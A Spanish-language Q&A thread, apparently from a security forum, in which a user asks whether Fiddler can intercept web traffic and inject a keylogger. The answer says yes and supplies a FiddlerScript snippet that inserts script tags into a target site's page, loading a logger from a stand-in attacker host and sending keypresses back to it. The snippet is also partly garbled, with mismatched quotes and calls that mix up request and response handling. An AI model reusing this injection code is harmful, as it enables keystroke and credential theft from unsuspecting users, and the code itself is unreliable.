Intercepte el tráfico web usando Fiddler y agregue una función de keylogger

1

¿Podemos interceptar el tráfico web utilizando Fiddler e inyectar una funcionalidad como el registrador de claves antes de que se realice la solicitud al servidor?

    
pregunta Adrian Gilbert 19.01.2017 - 00:02
fuente

1 respuesta

1

Sí, puedes hacer esto.

En primer lugar, debe agregar la extensión fiddler llamada secuencia de comandos de Fiddler . Esto le permite manejar eventos de Fiddler como OnBeforeRequest, OnBeforeResponse, etc.

Dado que necesita interceptar el tráfico a pedido, debe interceptar el evento OnBeforeRequest.

A continuación se muestra un código de ejemplo que puede utilizar para lograrlo utilizando el script fiddler. Tenga en cuenta que no podrá lograr exactamente lo que necesita de esta secuencia de comandos, pero úsela como inicio y modifíquela según sus necesidades.

if (oSession.HostnameIs("www.yourtargetsite.com") && oSession.HTTPMethodIs("POST")) // or what ever your web method
{   
    oSession.utilDecodeResponse();
    var body = System.Text.Encoding.UTF8GetString(oSession.responseBodyBytes); // grab the request body here

    var logger = '<script src="http://yourhackingsite.com/logger.js"></script>';logger+='<script>destination=http://yourhackingsite.com/LogKeyPress?key=";</script>';

    body = body.replace("<head>",logger + "</head>");
    oSession.utilDecodeResponseBody(body); // inject your custom altered body   
}
    
respondido por el user3496510 19.01.2017 - 00:35
fuente

Lea otras preguntas en las etiquetas